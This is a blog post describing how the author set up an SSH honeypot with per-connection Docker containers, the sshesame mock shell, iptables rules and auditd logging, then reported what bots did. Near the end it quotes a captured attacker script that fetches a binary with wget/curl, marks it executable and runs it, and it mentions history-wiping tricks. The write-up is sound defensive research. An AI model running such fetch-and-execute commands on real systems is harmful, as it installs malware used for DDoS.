image Sorry for this image!

In my previous article ( ) I’ve modified SSH in order to print the password that bots or “hackers” where trying against my server.

I felt that the next step is letting them in , so that’s what i did last week.


  • They will be logging in to a container with minimal capabilities
  • They won’t get shell , they will get a mock of a shell(sshesame)
  • Any passwords that they try will work (to get all them h4ck3rs)
  • This runs on a vanilla instance that I will destroy after this article
  • If you don’t want to read all the implementatin the output can be found at the end of the article.

Step 1 Docker:


Docker is the obvious option , but i had a number of concerns , from attacks that run from the container triggering some kind of resource exhaustion (fork bombs , file number etc etc) to uploads, yes uploads i was concerned people uploading wrong content to the containers on my servers.

Also i didn’t want to let all the bots log into the SAME container , i want to give one container per bot

Step 2 Make Docker unusable:


I’ll drop all the capabilities and then add the ones i really need:

docker run **--read-only** **--privileged=false** **--cap-drop all --cap-add SYS_CHROOT --cap-add SETGID --cap-add SETUID --cap-add CHOWN**  -dt bechampion/honey

I’ve could’ve limited the memory too but i forgot about it .

The second thing I’ve used is a project called sshesame which i forked ( and I’ve added some modifications.

Basically sshesame acts as an openssh server and mocks a shell , it let’s you in and for any command you run it returns nothing for example: image That’s the server running you can see that my password was “anything “ , literally everything goes:


So that’s the deal , it let’s you in using any password , and you can run commands all you want , they don’t return anything.

Lastly I wanted to disallow internet access from the container itself as well as sshing into the host so iptables and sysctl helped here as:

echo 0 > /proc/sys/net/ipv4/ip_forward  
iptables -A INPUT -i docker0 -p tcp --destination-port 22 -j DROP

Step 3 Docker TOO unusable:


I realised after a little test that most bots where running uname -a and exiting in complete sadness , so i forked sshesame and added a number of commands, motds and PS1 promts , have a look at ( and other places too.

Step 4 Give each connection a unique container:


Well if i woul’ve used some normal docker port translation , for example

docker run -dt -p 22:2222 image

That would land all the attackers or bots in the same container , but Ididn’t want that , i want each individual bot/attacker in it’s own container.

So xinetd and socat to the rescue:

So that’s what the service looks like in xinetd , REMEMBER TO CHANGE /etc/services to match this port assignment .

So every connection coming into port 22 will execute , looks like:

The most important thing here is , i get the container ip and i run

exec /usr/bin/socat stdin tcp:${DIP}:2222,retry=60

That sends all the traffic comming in from xinetd to the container in question in it’s native port , that happens to be 2222

Step 5 Log all them commands:


Before i came across sshesame , i was thinking stracing all the containers or auditd , auditd came in handy to be honest i got to log all the execve calls with something like:

-b 8192  
-f 1  
--backlog_wait_time 0  
-a exit,always -F arch=b64 -S execve

I managed to get something similar with strace as well:

strace -ffffff -p 10521 -s 100000 #optional -e trace=execve

Ultimately , I’ve decided to use sshesame default json logging , which is stdout when running in the container. It looks something like: image JSON is great.

Step 6 Make a dockerfile and push it up:


So the next step was create a multi staged docker file that compiles sshesame and copies it to alpine, it looks like this


docker build . -t honey

All this can be found in:



I must say that for some bizarre reason days went by without people logging in , i would get an eventual port scanning and that was it , but after a few days some things started to appear: image When i saw this is when i started to think that sshesame maybe was TOO obvious , and I’ve added the modifications that i stated above.

After a few days:

For a few days i didn’t see anything interesting , just unames or /proc/cpuinfo … but then things started to show up

Example 1:


Command":"#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget [http://URL/ys53a\ncurl]( -O [http://URL/ys53a\nchmod]( +x ys53a\n./ys53a\n"

Basically downloading something , chmod it and run it , most of these hosts will go offline after a few minutes.

Example 2:

image The same thing really , but this guy was most careful , removing his bash_history for example or

mv /bin/wget /bin/good (which happens to be the crap he downloaded)

Without going into much detail , the file’s they’re downloading are elfs , stringing them you get something like: image All sorts of worrying things , insmods , cronjobs , url requests and sockets ..I ran this through some antivirus and they seemed to be used for DDOS.

Wrapping it up:

I hope this is a sort of an illustration of what things you can get with an SSH honey pot , to be fair I was expecting something more advanced , but it ended up being that ..I’m pasting everything in gist , so you can get it here: